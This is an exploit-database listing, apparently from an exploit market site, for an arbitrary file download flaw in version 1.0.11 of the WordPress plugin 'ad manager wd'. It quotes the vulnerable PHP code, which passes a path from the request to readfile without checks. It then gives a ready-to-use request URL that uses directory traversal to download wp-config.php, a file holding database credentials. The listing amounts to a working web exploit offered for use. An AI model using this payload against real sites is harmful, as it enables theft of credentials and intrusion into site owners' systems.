[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress ad manager wd v1.0.11 Plugin - Arbitrary File Download Vulnerability

Author
41!kh4224rDz
Risk
[
Security Risk High
]
0day-ID
0day-ID-32060
Category
web applications
Date add
25-01-2019
Platform
php
# # # # # 
# Exploit Title: WordPress Plugin ad manager wd v1.0.11 - Arbitrary File Download
# Google Dork: N/A
# Date: 25.01.2019
# Vendor Homepage: https://web-dorado.com/products/wordpress-ad-manager-wd.html
# Software: https://wordpress.org/plugins/ad-manager-wd/
# Version: 1.0.11
# Tested on: Win7 x64, 
# # # # # 
# Exploit Author: 41!kh4224rDz
# Author Mail : scanweb18@gmail.com
# # # # #
#  Vulnerability:
#  wp-content\plugins\ad-manager-wd\wd_ads_admin_class.php
#
#    30/  if (isset($_GET['export']) && $_GET['export'] == 'export_csv')
#  
#    97/   $path = $_GET['path'];
#            header('Content-Description: File Transfer');
#            header('Content-Type: application/octet-stream');
#            header('Content-Transfer-Encoding: binary');
#            header('Expires: 0');
#            header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
#            header('Pragma: public');
#
#            header('Content-Type: text/csv; charset=utf-8');
#            header('Content-Disposition: attachment; filename=' . basename($path));
#
#            readfile($path);
#			
# Arbitrary File Download/Exploit :
#
# http://localhost/wordpress/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php
# 
# # # # #


#  0day.today [2024-11-15]  #